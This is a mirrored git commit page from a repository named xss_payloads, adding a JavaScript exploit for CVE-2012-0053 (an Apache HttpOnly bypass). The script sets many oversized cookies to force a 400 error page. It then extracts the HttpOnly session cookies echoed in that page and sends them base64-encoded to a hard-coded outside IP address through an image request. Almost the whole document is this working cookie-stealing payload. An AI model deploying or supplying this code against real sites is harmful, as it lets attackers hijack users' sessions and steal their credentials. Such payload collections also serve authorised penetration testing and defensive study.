mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-11-24 21:23:08 +00:00
first commit
This commit is contained in:
commit
79558b73e2
2 changed files with 44 additions and 0 deletions
1
README.md
Normal file
1
README.md
Normal file
|
@ -0,0 +1 @@
|
||||||
|
# xss_payloads
|
43
apache_httponly_bypass.js
Normal file
43
apache_httponly_bypass.js
Normal file
|
@ -0,0 +1,43 @@
|
||||||
|
// Exploit for CVE-2012-0053
|
||||||
|
|
||||||
|
// Set megacookie
|
||||||
|
for( var j=0; j<100; j++ ){
|
||||||
|
var c = "x"+j+"=";
|
||||||
|
for( var i=0; i<500; i++ ){
|
||||||
|
c+='A';
|
||||||
|
}
|
||||||
|
document.cookie = c;
|
||||||
|
}
|
||||||
|
|
||||||
|
x=new XMLHttpRequest();
|
||||||
|
x.onreadystatechange = function(){
|
||||||
|
if( x.readyState == 4 ){
|
||||||
|
var data = '';
|
||||||
|
|
||||||
|
// 400 == exploit worked
|
||||||
|
if( x.status == 400 ){
|
||||||
|
aC = x.responseText.match(/<pre>([\s\S]*)<\/pre>/gm)[0].split(';');
|
||||||
|
for( var i=0; i<aC.length; i++ ){
|
||||||
|
if( !aC[i].trim().match(/x\d+=/) ){
|
||||||
|
data += aC[i].trim() + '; ';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Anything else, not useful
|
||||||
|
}else{
|
||||||
|
data = "Exploit failed";
|
||||||
|
}
|
||||||
|
|
||||||
|
// Remove megacookie
|
||||||
|
for( var j=0; j<100; j++ ){
|
||||||
|
document.cookie = "x"+j+"=; expires=Thu, 01 Jan 1970 00:00:00 UTC";
|
||||||
|
}
|
||||||
|
|
||||||
|
// Send back
|
||||||
|
// CHANGE THIS URL TO YOUR OWN
|
||||||
|
new Image().src = 'http://193.36.15.252/cookie?=' + btoa(data);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
x.open('GET', '/' , true );
|
||||||
|
x.send(null);
|
||||||
|
|
Loading…
Reference in a new issue